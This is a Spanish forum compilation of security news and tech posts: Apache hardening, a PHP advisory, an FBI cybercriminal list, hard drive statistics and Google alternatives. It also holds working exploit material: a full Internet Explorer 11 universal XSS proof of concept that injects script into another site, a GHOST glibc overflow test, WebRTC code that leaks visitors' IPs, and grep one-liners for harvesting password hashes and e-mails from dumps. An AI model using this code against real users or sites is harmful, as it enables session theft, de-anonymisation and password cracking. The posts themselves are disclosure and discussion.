Cierran este top 5 de cibercriminales más buscados por el FBI esta pareja de individuos que se dedicaron a engañar a miles de usuarios en más de 60 países para que instalasen software fraudulento que no hacía lo que se prometía. Se calcula que llegaron a causar pérdidas entre los usuarios por valor de más de 100 millones de dólares entre diciembre de 2006 y octubre de 2008, usando falsos anuncios ubicados en webs de compañías legítimas que mostraban a los usuarios que las visitaban alertas de seguridad falsas.

Mediante esta técnica del miedo se animaba a los usuarios a adquirir no solo falsos antivirus, sino también todo tipo de software fraudulento con una funcionalidad limitada o inexistente para eliminar las supuestas amenazas.

Estos ciberdelincuentes llegaron a fundar una empresa llamada Innovative Marketing, Inc usada como tapadera para ofrecer todos los productos fraudulentos con los que engañaban a los usuarios. De esta manera, si algún usuario se quejaba o reclamaba su dinero, los operarios contratados para atenderlos les mentían o incluso les llegaban a devolver el dinero para evitar que se presentasen informes de fraude a las autoridades y seguir operando con normalidad.
Conclusión

La creación de listas de criminales más buscados específicas para los delitos telemáticos demuestran la importancia y el incremento que este tipo de delitos han tenido durante los últimos años. En España no se hace aún esa distinción, pero contamos con grupos especializados como el Grupo de Delitos Telemáticos de la Guardia Civil o la Unidad de Investigación Tecnológica de la Policía Nacional que velan por la seguridad de todos los españoles en la red.

Josep Albors

Fuente:
http://blogs.protegerse.com/laboratorio/2015/07/03/el-fbi-actualiza-su-lista-de-los-ciberdelincuentes-mas-buscados/
#104
Bugs y Exploits / USB Killer
12 Marzo 2015, 18:43 PM



Por lo general, no se recomienda para conectar unidades USB extraños en un equipo, debido al riesgo de malware, pero un científico ruso afirma haber desarrollado una memoria USB que puede dañar un puerto USB de manera física..

El investigador decidió desarrollar un USB, llamado USB Killer.Se necesitan diferentes productos electrónicos en China y ordenó diferentes placas de circuito para memorias USB. Finalmente lo logró en sus propias palabras para hacer un modelo que utiliza tensión negativa y que en un ordenador puede resultar dañadino.


Algunos se preguntan si la memoria USB puede ser suficiente voltaje para provocar un incendio. El investigador tiene una breve descripción de cómo funciona publicó el USB Killer , pero se echa en falta extensos diagramas y dibujos. Sin embargo, se sugiere a los lectores si están interesados ​​en la compra de una unidad flash USB, y lo que hacen cuando se encuentran con una extraña memoria USB en su lugar de trabajo.



http://kukuruku.co/hub/diy/usb-killer
#106
Desarrollo Web / Seguridad y Hardening en Apache
11 Febrero 2015, 13:03 PM
Fortificando Apache

HTTP Request Methods

Default apache configuration support OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, CONNECT method in HTTP 1.1 protocol.

Código (apache) [Seleccionar]

<LimitExcept GET POST HEAD>
deny from all
</LimitExcept>



Web Application Security

Disable Trace HTTP Request

Código (apache) [Seleccionar]

TraceEnable off



Set cookie with HttpOnly and Secure flag

Requiere mod_headers

Código (apache) [Seleccionar]

Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure



Clickjacking Attack

https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options

<iframe> <object>

Opciones:

X-Frame-Options

DENY, SAMEORIGIN, ALLOW-URL url



Código (apache) [Seleccionar]

Header always append X-Frame-Options SAMEORIGIN


Cross Site Scripting (XSS)

Código (apache) [Seleccionar]

Header set X-XSS-Protection "1; mode=block"



HTTP Strict Transport Security

https://www.owasp.org/index.php/HTTP_Strict_Transport_Security

Código (apache) [Seleccionar]

Header set Strict-Transport-Security "max-age=31536000; includeSubDomains"


Todo junto fichero confgiuración httpd.conf

Código (apache) [Seleccionar]


CoreDumpDirectory /tmp

# bajar timeout, por defecto 300
Timeout 80

# Maximum size of the request body.
#LimitRequestBody 10000
# Maximum number of request headers in a request.
LimitRequestFields 40
# Maximum size of request header lines.
LimitRequestFieldSize 4094
# Maximum size of the request line.
#request failed: URI too long (longer than 500)
#LimitRequestLine 500

#nuevo antidos
#RLimitCPU 10 20
#RLimitCPU 100 100
#RLimitMEM 10000000 10000000
#RLimitNPROC 25 25

# esconder versión Apache, aka  version banner
ServerTokens Prod

#seguridad
# http://httpd.apache.org/docs/2.2/mod/core.html#traceenable
TraceEnable off

#seguridad

<ifModule mod_headers.c>
Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure
#https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options
Header always append X-Frame-Options SAMEORIGIN
Header set X-XSS-Protection "1; mode=block"
Header set X-Content-Type-Options: "nosniff"
</ifModule>

# https ssl

SSLRandomSeed startup file:/dev/urandom 1024

<IfDefine SSL>

# enable SSLv3 and TLSv1, but not SSLv2
#SSLProtocol all -SSLv2
#SSLProtocol -ALL +SSLv3 +TLSv1
# https://community.qualys.com/blogs/securitylabs/2013/08/05/configuring-apache-nginx-and-openssl-for-forward-#secrecy
# new 2014
# https://www.ssllabs.com/ssltest/analyze.html?d=foro.elhacker.net
# Grade A, antes Grade F
SSLProtocol all -SSLv2 -SSLv3
SSLHonorCipherOrder on
SSLCipherSuite "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 \
EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA+RC4 \
EECDH EDH+aRSA RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS"
#SSLCipherSuite ALL:!ADH:!NULL:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+TLSv1 SLv2:+EXP:+eNULL

# mozilla
# https://wiki.mozilla.org/Security/Server_Side_TLS
# SSLCipherSuite AES256+EECDH:AES256+EDH:!aNULL:!eNULL

# noviembre 2014
SSLProtocol All -SSLv2 -SSLv3
SSLHonorCipherOrder on
SSLCipherSuite "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+AESGCM EECDH EDH+AESGCM EDH+aRSA HIGH !MEDIUM !LOW !aNULL !eNULL !LOW !RC4 !MD5 !EXP !PSK !SRP !DSS"

</IfDefine>
#107

Vulnerability Summary

Due to a lack of complete coverage for X-Frame-Options (XFO) support on Google's Play Store web application domain, a malicious user can leverage either a Cross-Site Scripting (XSS) vulnerability in a particular area of the Google Play Store web application, or a Universal XSS (UXSS) targeting affected browsers, to remotely install and launch the main intent of an arbitrary Play Store provided Android package (APK).

https://community.rapid7.com/community/metasploit/blog/2015/02/10/r7-2015-02-google-play-store-x-frame-options-xfo-gaps-enable-android-remote-code-execution-rce
#108
España sufrió en el 2014 más de 70.000 ataques cibernéticos, la cifra más alta tras EEUU y Reino Unido


España sufrió en el 2014 más de 70.000 ataques cibernéticos, lo que le convierte en el tercer país del mundo que más agresiones de este tipo recibe, solo por detrás de EEUU y Reino Unido, ha revelado este jueves el ministro de Asuntos Exteriores y de Cooperación, José Manuel García-Margallo.

Estos ataques se dirigieron contra diferentes órganos de la Administración pública, pero entre sus víctimas también figuran empresas y ciudadanos, ha precisado el jefe de la diplomacia española, que ha rehusado dar a la prensa más detalles sobre esta revelación al término de su intervención.

El ministro del Interior, Jorge Fernández Díaz, presente en el acto, tampoco ha querido precisar de dónde venían estas agresiones o a quiénes ha afectado, más allá de señalar que "no pocos" de esos ataques se han dirigido contra la "Administración pública". Eso sí, ha querido mandar un mensaje de tranquilidad a la opinión pública, pues el Gobierno está "trabajando muy intensamente" para protegerse frente a esta amenaza. "Estamos haciendo los deberes", ha remachado.

En su intervención en la conferencia, García-Margallo ha recordado que el Ejecutivo cuenta desde diciembre del 2013 con un Consejo Nacional de Ciberseguridad encargado de coordinar a los diferentes Ministerios que en la actualidad elaboran un Plan Nacional en la materia, que tendrá en cuenta las estrategias de la UE y la OTAN sobre ciberseguridad .

La Estrategia de Seguridad Nacional española, ha añadido, ya identifica los actos hostiles que llegan a través del ciberespacio como "una de las 12 amenazas más serias" para el país. No obstante, García-Margallo ha subrayado que el ciberespacio "también es un espacio de libertad".

Por eso ha advertido de que, aunque puede ser "comprensible" tener la "tentación de controlar y restringir" el uso de Internet con el "pretexto de garantizar la seguridad", actuar de esta manera podría tener "errores fatales para el progreso humano".

Fuente:
http://www.elperiodico.com/es/noticias/sociedad/espana-sufrio-2014-mas-70000-ataques-ciberneticos-cifra-mas-alta-tras-eeuu-reino-unido-3912391

Más información:

¿Cómo detecta España los 70.000 ataques cibernéticos que cuenta el Ministro Margallo?
http://www.elladodelmal.com/2015/02/como-detecta-espana-los-70000-ataques.html
#109
Bugs y Exploits / XSS en Internet Explorer 11
4 Febrero 2015, 11:08 AM
La última versión estable de Internet Explorer, la 11.0.15, puede permitir a un atacante inyectar código y robar los datos de otras páginas que el usuario tiene abiertas en otras pestañas o ventanas. Se trata de un Cross Site Scripting universal o UXSS que evade totalmente la Política del Mismo Origen o Same Origin Policy (SOP), es decir, da igual que una web tenga o no vulnerabilidades XSS, sólo por usar la última versión del navegador de Microsoft el usuario está expuesto a que le roben los datos de su sesión en cualquier otro dominio, incluso HTTP a HTTPS.

Existe una PoC en la que se demuestra como es posible inyectar código en el Daily Mail a través de otro dominio distinto:

http://www.deusen.co.uk/items/insider3show.3362009741042107/

<iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br>
<iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br>
<script>
function go()
{
  w=window.frames[0];
  w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
}
setTimeout("go()",1000);
</script>


Por el momento Microsoft no ha publicado un parche para solucionar esta vulnerabilidad. Estamos probando distintas mitigaciones y analizando el bug (en versiones anteriores la PoC no funciona) pero por el momento aconsejamos usar otros navegadores.

Fuente:
http://www.hackplayers.com/2015/02/xss-universal-en-ie11.html
#110
CitarContinuing in the footsteps of its predecessor, MySQL 5.7 is set to be a groundbreaking release. In this webinar, the engineers behind the product provide insights into what's new for MySQL replication in the latest 5.7 Development Milestone Release and review the early access features available via labs.mysql.com. The next generation of replication features cover several technical areas such as better semi-synchronous replication, an enhanced multithreaded slave (per-transaction parallelism), improved monitoring with performance schema tables, online configuration changes, options for fine-tuning replication performance, support for more-advanced topologies with multisource replication, and much more. This is also a great chance to learn about MySQL Group Replication – the next generation of active-active, update-anywhere replication for MySQL.

http://www.slideshare.net/andrewjamesmorgan/mysql-replication-whats-new-in-mysql-57-and-beyond
#111
GNU/Linux / GHOST: PoC
27 Enero 2015, 18:26 PM
GHOST: glibc: buffer overflow en gethostbyname CVE-2015-0235
http://blog.elhacker.net/2015/01/ghost-glibc-buffer-overflow-en-gethostbyname-cve-2015-0235.html

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
    puts("vulnerable");
    exit(EXIT_SUCCESS);
  }
  if (retval == ERANGE) {
    puts("not vulnerable");
    exit(EXIT_SUCCESS);
  }
  puts("should not happen");
  exit(EXIT_FAILURE);
}



gcc GHOST.c -o GHOST
#112
Get local and public IP addresses in javascript (github.com)
https://github.com/diafygi/webrtc-ips

Usando WebRTC


Código (javascript) [Seleccionar]
//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events
        if(ice.candidate){

            //match just the IP address
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
            var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

            //remove duplicates
            if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);

            ip_dups[ip_addr] = true;
        }
    };

    //create a bogus data channel
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){

        //trigger the stun server request
        pc.setLocalDescription(result, function(){});

    }, function(){});
}

//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});
#113
Fecha de publicación:
    23/01/2015

Recursos afectados

    Versiones de la rama 5.6 de PHP anteriores a la 5.6.5.
    Versiones de la rama 5.5 de PHP anteriores a la 5.5.21.
    Versiones de la rama 5.4 de PHP anteriores a la 5.4.37.

Descripción

PHP ha publicado las versiones 5.6.5, 5.5.21 y 5.4.37, que corrigen múltiples fallos en distintos componentes del software, incluido el core.
Solución

Aplicar las actualizaciones 5.6.5, 5.5.21 y 5.4.37 segun la rama correspondiente.
Detalle

Las actualizaciones solucionan múltiples fallos en las versiones afectadas, incluyendo la corrección de las siguientes vulnerabilidades:

    Uso después de liberación de memoria en la función unserialize(). Esta vulnerabilidad tiene asociado el identificador CVE-2015-0231.
    Caída de php-cgi por acceso de lectura fuera de límites. Esta vulnerabilidad tiene asociado el identificador CVE-2014-9427.
    Llamada de liberación de memoria sobre puntero sin inicializar. Esta vulnerabilidad tiene asociado el identificador CVE-2015-0232.

Referencias

    PHP Changelog

http://php.net/ChangeLog-5.php


Fuente:
https://www.incibe.es/securityAdvice/CERT/Alerta_Temprana/Avisos_seguridad_tecnicos/actualizaciones_php_565_5521_5437_20150123
#114
Según un estudio realizado por la empresa Backblaze entre más de 25,000 discos duros:


Hitachi Vs Seagate Vs Western Digital



Modelos analizados:

HGST Deskstar
HGST Megascale

Seagate Barracuda
Seagate Desktop

Western Digital Red

Evolución de número de discos duros:



Los que menos fallan:



Los disdos duros de 4TB son fantásticos.

Cuidado con los discos durosde 3TB de Seagate y de 1,5TB



Todavía no tienen suficiente información recopilada sobre los discos duros de 6TB


Tiempo de vida media según marca:




El 80% de los discos duros tienen una media de 4 años.



Fuente:
https://www.backblaze.com/blog/best-hard-drive/

https://www.backblaze.com/blog/what-hard-drive-should-i-buy/

Más info:
http://blog.elhacker.net/2013/03/modelos-marcas-mejor-disco-duro-multimedia-externo-ssd.html
#115
Hacking / Cheat-sheet para password crackers
22 Enero 2015, 17:40 PM
Extract md5 hashes

# egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt

An alternative could be with sed

# sed -rn 's/.*[^a-fA-F0-9]([a-fA-F0-9]{32})[^a-fA-F0-9].*/\1/p' *.txt > md5-hashes

Extract valid MySQL-Old hashes

# grep -e "[0-7][0-9a-f]\{7\}[0-7][0-9a-f]\{7\}" *.txt > mysql-old-hashes.txt


Extract blowfish hashes

# grep -e "\$2a\\$\08\\$\(.\)\{75\}" *.txt > blowfish-hashes.txt


Extract Joomla hashes

# egrep -o "([0-9a-zA-Z]{32}):(\w{16,32})" *.txt > joomla.txt


Extract VBulletin hashes

# egrep -o "([0-9a-zA-Z]{32}):(\S{3,32})" *.txt > vbulletin.txt

Extraxt phpBB3-MD5

# egrep -o '\$H\$\S{31}' *.txt > phpBB3-md5.txt

Extract Wordpress-MD5

# egrep -o '\$P\$\S{31}' *.txt > wordpress-md5.txt

Extract Drupal 7

# egrep -o '\$S\$\S{52}' *.txt > drupal-7.txt

Extract old Unix-md5

# egrep -o '\$1\$\w{8}\S{22}' *.txt > md5-unix-old.txt


Extract md5-apr1

# egrep -o '\$apr1\$\w{8}\S{22}' *.txt > md5-apr1.txt


Extract sha512crypt, SHA512(Unix)

# egrep -o '\$6\$\w{8}\S{86}' *.txt > sha512crypt.txt

Extract e-mails from text files

# grep -E -o "\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt


Extract HTTP URLs from text files

# grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txt


Fuente:
http://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers/
#116
PHP / PHP Vulnerability Hunter
15 Enero 2015, 17:20 PM
PHP Vulnerability Hunter es un fuzzer  que permite encontrar esta serie de fallos en proyectos PHP:

- Arbitrary command execution
- Arbitrary file read/write/change/rename/delete
- Local file inclusion
- Arbitrary PHP execution
- SQL injection
- User controlled function invocatino
- User controlled class instantiation
- Reflected cross-site scripting (XSS)
- Open redirect
- Full path disclosure
#117
Foro Libre / Lizard Squad
2 Enero 2015, 11:21 AM
Aquí tenéis a DarkCode uno de los miembros de Lizard Squad por las mañanas:

[youtube=640,360]http://www.youtube.com/watch?v=qRNlUjQ3Dvk[/youtube]

Fuera bromas, pero seguramente muchos de los miembros de Lizard Squad seguro que son menores de edad, y se especula que hay uno de Australia de 12 años jajaja

Ahora en serio, en este blog hablan sobre los posibles miembros de Lizard Squad de una manera más interesante:

http://krebsonsecurity.com/2014/12/lizard-kids-a-long-trail-of-fail/

No se limitan a hablar de las detenciones en Finlandia y sus leyes de extradición, y tratan el tema de una manera más técnica, con sus herramientas, los servicios DDoS que ofrecen, los foros que visitan, sus costumbres, etc, muy interesante.

Muy entretenida la lectura de la investigación de Brian Krebs acerca de estos grupos de criminales menores xD
#118
Día de más actividad: 14 octubre con 50 millones de hits y 310gb de tráfico (transferencia) en un día.







Ataques destacables también el día 17 de octubre y el miércoles y jueves 29-30 de octubre.

Top Países Infectados:

1- China
2- Venezuela
3- Iraq
#119
Android / Samsung Galaxy S4 vs LG Google Nexus 5
16 Octubre 2014, 17:20 PM
¿Cuál es mejor?



Ahora en España están a un precio similar, sobre unos 350€

La pantalla es muy similar, la cámara un poco mejor en el S4, y el Nexus es libre y  se puede tener la última versión de Android sin problemas, pero no tiene ranura de tarjeta SD, ni se puede cambiar la batería.

¿Con cuál de de los dos te quedarías?
#120
Redes / Diferencias entre modo bridge y DMZ
29 Septiembre 2014, 20:42 PM
Según tengo entendido en si eliges DMZ el router sigue "analizando" los paquetes y tiene que "procesarlos" y en modo puente "bridge" no. ¿Es cierto?

DMZ supongo que usa NAT y el modo bridge no.

Me interesa poner un ONT de fibra óptica en modo bridge y comprar un router neutro, porque tengo puesto un router-ont con una DMZ y se colapsa cuando recibe muchos paquetes (pierde paquetes o se reinicia). Creo que es culpa del firmware, más que del hardware (ZHone ZNID GPON 2516)

Para ponerlo en modo Bridge adamo usa el Router ONT Zhone 2426

El router neutro elegido es un Asus RT-AC68U
#121
Desde el día 24 de agosto hasta ayer el coreo de registro que manda el  foro para activar la cuenta del foro así como demás notificaciones del foro no ha sido mandadas a las cuentas @hotmail.com no han llegado.

¿El motivo?

CitarFinal-Recipient: RFC822; xxxx@hotmail.com
Action: failed
Status: 5.0.0
Diagnostic-Code: SMTP; 550 SC-001 (COL004-MC4F39) Unfortunately, messages from xxxxxx weren't sent. Please contact your Internet service provider since part of their network is on our block list. You can also refer your provider to http://mail.live.com/mail/troubleshooting.aspx#errors.

Falso positivo por spam.

CitarBlocked due to user complaints or other evidence of spamming

Ahora los mensajes llegan, pero van directamente a la carpeta de "Correo no deseado"

Por lo visto Microsoft no tiene bastante con los registros SPF y una reputación intachable.

CitarAuthentication-Results: hotmail.com; spf=pass (sender IP is XXXX) smtp.mailfrom=foro@elhacker.net; dkim=none header.d=elhacker.net; x-hmca=pass header.id=foro@elhacker.net
#122
El nacimiento del servicio de películas y series por streaming se remonta a 1997 en Estados Unidos.

Está previsto su lanzamiento para septiembre de este mismo año en Alemania, Francia, Austria, Suiza, Bélgica y Luxemburgo.

Las causas de su retraso en España son la dificultad para conseguir los derechos de autor, la piratería y la competencia ya existente.

El nacimiento de Netflix se remonta a 1997 en Estados Unidos, pero su auténtica eclosión se produjo bastantes años después, con el aumento del ancho de banda y la popularización del visionado por streaming en 2007. Después de varios años centrada en EEUU, la compañía saltó a Canadá en 2010 y a Latinoamérica en 2011, con lanzamientos escalonados en Argentina, Paraguay, Uruguay, Bolivia, Chile, Colombia, Ecuador, Perú y Venezuela.

A Europa no llegó hasta 2012 y solo existe en el  Reino Unido

A Europa, un mercado muy fragmentado donde la obtención de licencias además se complica aún más según el país, no llegó hasta 2012, con el lanzamiento de Netflix en Reino Unido. En este sentido, ya han pasado dos años y en el resto de países de Europa seguimos esperando. Mientras, otros servicios, como el español Wuaki.tv -adquirido por la multinacional japonesa Rakuten en 2012, con 1.200.000 usuarios en España y 250.000 en Reino Unido y a punto de llegar a Italia, Francia y Alemania este año- o Yomvi, del Grupo Prisa y Telefónica, con 430.000 usuarios únicos a finales de 2013, van ganando peso y se consolidan.

Netflix lo tiene complicado para ofrecer en Europa, en general, y en nuestro país, en particular, un servicio tan completo y con tantos títulos como en su país de origen, Estados Unidos. Sin embargo, lo que está claro es que en España y en otros países de Europa hay quienes han encontrado su hueco en este negocio y Netflix se está quedando fuera.

Parece que en la compañía estadounidense son conscientes de que están cediendo terreno en el viejo continente y está previsto el lanzamiento de Netflix en Alemania, Francia, Austria, Suiza, Bélgica y Luxemburgo para septiembre de este mismo año, tal y como se confirmóhace algunas semanas.

Segunda gran expansión

Según han informado fuentes cercanas a Netflix conocedoras de estos planes, la compañía está planeando una segunda gran expansión en Europa, que se produciría en el último trimestre de 2015. De esta forma, pasaría un año desde el lanzamiento en los primeros países europeos -más allá de Reino Unido- y la segunda oleada. De momento, dichas fuentes solo han podido confirmar el lanzamiento en España, pero no el resto de países que recibirán el servicio en el último trimestre del año próximo.

Tampoco han podido aclarar estas fuentes el motivo de la demora del lanzamiento de Netflix en España, aunque seguramente sea una mezcla de dificultad para conseguir los derechos de muchos títulos, la gran penetración de la piratería en nuestro país y la competencia ya existente que se ha creado en el mercado de los videoclubs online en los últimos años.

Ya en 2011, desde la Asociación de Internautas, citando un sondeo interno realizado por Netflix al que habían tenido acceso, aseguraron que el servicio tardaría mucho en llegar a nuestro país porque los "abusivos derechos de autor en España representarían un coste de 2 a 3 veces mayor que esos mismos derechos en otros países de nuestro entorno, como Francia o Alemania".

Fuente:
http://www.20minutos.es/noticia/2205038/0/netflix/llegar-espana/ultimo-trimestre-2015/
#123
Hace ya más de 4 años desde que escribí aquel artículo sobre cómo huir de Google. O mejor dicho, como intentar huir. El hecho de usar servicios alternativos puede ser una buena opción si queremos proteger más nuestra privacidad, o si queremos ampliar nuestro repertorio de servicios ajustándolos a nuestros gustos y necesidades. Puede que incluso haya más razones. No hay que negar que Google ha hecho un buen trabajo con sus productos y que incluso ahora admira, defiende, promueve y premia el cifrado de datos, pero una cosa no quita la otra.
Bienvenida a la internet by William Dalebout

Las cosas han cambiado muchísimo desde aquella entrada. 4 años dan para mucho. No sólo nos hemos adentrado en un mundo de sistemas operativos móviles, sino que han aparecido nuevos servicios, otros se han consolidado y otros aún se están haciendo un hueco. Y tras toda la serie de escándalos sobre privacidad que más o menos todos sabemos, la competencia ha endurecido sus propuestas y su calidad. Es difícil que esta lista no sea tan extensa como aquella clásica que hice (y que aún a día de hoy recibe la gran mayoría de las visitas del blog). Espero acertar mucho más a la hora de ofrecer servicios de gran calidad y que ya se han consolidado, es decir, servicios fuertes, asegurando su supervivencia. También pretendo (creo que en vano) no ahogar con exceso información. E incluso, también, que estos servicios alternativos ya populares y consolidados tengan aún más público con todo lo bueno que puede conllevar. También pretendo que sea bastante universal e interoperativo, dejando de lado el hecho de qué SO usamos, y si es uno de escritorio o enfocado a lo móvil y a la nube. Procuraré dar algo de información sobre cada servicio a pesar de que con el tiempo se puede degradar, pero al menos se sabrá por donde van los tiros.

Buscadores web

    DuckDuckGo: el rey absoluto e indiscutible. Creo que podría poner solo este en la lista y sería más que suficiente. Entre sus muchas y conocidas bondades destaca el hecho de ser muy cercano a la filosofía del código abierto, todas sus búsquedas están cifradas, no las rastrea y no guarda los datos de éstas más de un mes en sus servidores. Tiene un algoritmo de búsqueda propio, puede buscar en otros buscadores y servicios directamente gracias a los bangs, se puede configurar por zonas geográficas... Es un servicio web tan enormemente versátil y extenso que me atrevería a decir que nadie sabe manejarlo al 100%, no porque sea un caos, sino porque a mi manera de ver DuckDuckGo es como si tuviera internet entero contenido en sí mismo. Siempre en constante evolución, siempre aumentando el número de bangs, siempre mejorando su diseño... Su ayuda es igualmente extensa, una auténtica biblia de qué hacer con este "super pato". Para saber el funcionamiento básico, podéis leer más en un artículo que le he dedicado, y que sigue vigente (lo recomiendo). Es un servicio y buscador que no defrauda jamás, y si se dedica unos 10 minutos en aprender lo básico del sistema de bangs, casi no haría falta seguir leyendo este artículo.
    IxQuick: y su servicio paralelo StartPage, otro buscador (o mejor dicho, metabuscador) que fue de los primeros en preocuparse por la privacidad. Era mi buscador por defecto hace años, pero está claro que ha quedado muy atrás, tanto en funcionalidades como en diseño. Básicamente enlaza búsquedas de otros motores (sobre todo Google), procurando el cifrado y evitando el seguimiento  de las IP.
    Blekko: buscador poco popular pero muy interesante. Podríamos decir que en cierto sentido es la actual competencia de DuckDuckGo, aunque ni de lejos se le acerca en funcionalidades, ya que se centra en la sencillez. Su privacidad es muy buena (de hecho se puede configurar y tener una cuenta en él) y su interfaz es realmente bonita. Estoy seguro que sus resultados no son para todos los gustos: es una mezcla entre el sistema de DuckDuckGo y el sistema "democrático" de Google, basándose en un top de búsquedas y palabras clave.
    Bing: me da igual lo que digan los Microsoft haters. Este buscador es realmente bueno a pesar de todo. Probablemente fuera de EEUU no sea tan genial (aún está por ver), pero aún así ha mejorado muchísimo. Gracias a la presión de Windows 8 y sobre todo Windows Phone y su asistente virtual Cortana, este buscador se ha vuelto una maravilla. Realmente tiene ciertas mejores condiciones de privacidad que Google, su algoritmo de búsqueda arroja resultados bastante similares a DuckDuckGo y por tanto no incluye tanto spam o resultados cuestionables como Google (el cual se basa bastante en la democracia del consumidor, no siempre acertada...). Un buscador muy centrado en páginas oficiales y en ser bastante más objetivo. Si además usáis Windows, Windows Phone, Cortana y otros productos de Microsoft, tenéis un combo mortal que poco tiene que envidiar a la integración de la gran G. Su gran diseño minimalista, con las fotografías de exquisita calidad que cambian todos los días en su página principal, le dan un toque de buen gusto. Si os preocupa "mucho muchísimo" el tema de NSA no creo que sea muy buena elección en ese aspecto...
    Yahoo!: el portal web y buscador rey de los 90 sigue en pie. Se puede buscar desde su portal principal (lleno de tantos datos que marea) o bien desde su función de búsqueda directa. Realmente tener este buscador aquí es algo banal, ya que las búsquedas  las proporciona básicamente Bing, que he nombrado anteriormente. Pero tiene pequeñas diferencias, enfocadas básicamente a sus propios servicios. Además, su portal ofrece acceso directo a muchos servicios integrados que pueden sustituir a los de Google.
    Lycos: otro clásico de los 90 que sigue siendo funcional, con su propio portal en español. Muy buena interfaz y también una serie de servicios como correo electrónico, sala de chat, páginas amarillas o información meteorológica. Sus políticas de privacidad son bastante buenas también. A día de hoy, con tantos bandazos todos estos años, no me ha quedado muy claro qué motor usa. Si mi información es correcta, en los 90 empezó con un algoritmo propio, tras las crisis y las compra-ventas empezó a enlazar otros buscadores, y ahora parece que es de nuevo independiente, o al menos semi-independiente. Sea como sea, le pasa un poco como a Yahoo!: es interesante. De hecho es más interesante a día de hoy que Yahoo!, en mi opinión.

Mapas

    Here: el anteriormente conocido como Ovi, el servicio de mapas de Nokia es para mi, probablemente, el mejor competidor de Google Maps. Su calidad es muy buena y sus búsquedas son muy acertadas; tiene vista de mapa, vista satélite, vista 3D y de elevación de terreno. También funciones de clima, tráfico y rutas de transporte público. Tiene una función similar al StreetMap de Google, aunque no funciona en todas las ciudades. Su servicio es tan bueno gracias a Windows Phone, sin ir más lejos, ya que Nokia ha hecho de Here la aplicación predeterminada de mapas y navegación en la gama Lumia. Por cierto, si sois los afortunados de tener la aplicación móvil de Here gozáis de la posibilidad de navegación offline.
    Open Street Map: servicio de mapas libre y open source. Evoluciona rápido y ofrece un servicio muy completo y detallado si lo vamos a usar como mapa plano o callejero. Contiene mapas de vías ciclistas y transporte público entre algunos más. No gozamos de un servicio de navegador (y mucho menos a la altura de los Google o Nokia) pero podemos incorporar algunos datos de GPS. Si quieres buenos mapas detallados de los de toda la vida, creo que es la mejor opción posible a día de hoy. Si buscas algo más al estilo de Google Maps, creo que de momento es mejor que lo olvides. También hay aplicaciones móviles basadas en este servicio.
